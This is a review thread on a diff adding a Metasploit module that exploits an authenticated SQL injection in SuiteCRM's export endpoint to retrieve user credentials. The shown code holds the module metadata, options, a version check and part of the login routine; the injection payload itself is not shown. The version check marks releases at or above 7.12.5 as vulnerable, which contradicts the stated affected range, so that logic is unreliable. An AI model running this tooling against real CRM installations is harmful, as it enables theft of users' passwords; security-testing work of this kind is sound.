modules/auxiliary/scanner/http/suite_crm_export_sqli.rb

```diff
@@ -0,0 +1,244 @@
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SuiteCRM authenticated SQL injection in export functionality',
+        'Description' => %q{
+          This module exploits an authenticated SQL injection in SuiteCRM in versions before 7.12.6. The vulnerability
+          allows an attacker to send specically crafted requests to the export entry point of the application in order
+          to retrieve all the usernames and their associated password from the database.
+        },
+        'Author' => [
+          'Exodus Intelligence', # Advisory
+          'jheysel-r7', # poc + msf module
+          'Redouane NIBOUCHA <rniboucha@yahoo.fr>' # sql injection help
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/']
+        ],
+        'Actions' => [
+          ['Dump tables', { 'Description' => 'Dumps database tables' }]
+        ],
+        'DefaultAction' => 'Dump tables',
+        'DisclosureDate' => '2022-06-09',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]),
+      OptString.new('USERNAME', [true, 'Username of user', 'normal_user']),
+      OptString.new('PASS', [true, 'Password for user', 'normal_user']),
+    ]
+  end
+
+  def check
+    authenticated = authenticate
+    fail_with Failure::NoAccess, 'Unable to authenticate to SuiteCRM' unless authenticated
+
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Home',
+          'action' => 'About'
+        }
+      }
+    )
+
+    fail_with Failure::NoAccess, 'Unable to access the SuiteCRM version page' unless res&.body
+    version = Rex::Version.new(res.body.match(/Version\s+((?:\d+\.)+\d+).*/)[1])
+
+    fail_with Failure::BadConfig, 'Could not find retrieve the version of SuiteCRM from the version page' unless version
+    print_status "Version detected: #{version}"
+
+    return Exploit::CheckCode::Vulnerable if version >= Rex::Version.new('7.12.5')
+
+    Exploit::CheckCode::Safe
+  end
+
+  def authenticate
+    print_status("Authenticating as #{datastore['USERNAME']}")
+    initial_req = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Users',
+          'action' => 'Login'
+        }
+      }
+    )
+
+    return false unless initial_req && initial_req.code == 200 && initial_req.body.include?('SuiteCRM')
```

Comment:
Need a bit more of a check here, the string SuiteCRM on its own isn't unique enough.

Reply:
Added a check for a specific cookie

Reply:
Looks good!

Reply:
Going to review this and see if we can't find a specific login cookie that is set once you successfully log in, but otherwise improvements look good.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/16828/commits/6531ad1c5cab6f3fc02cf72904c33917ca384013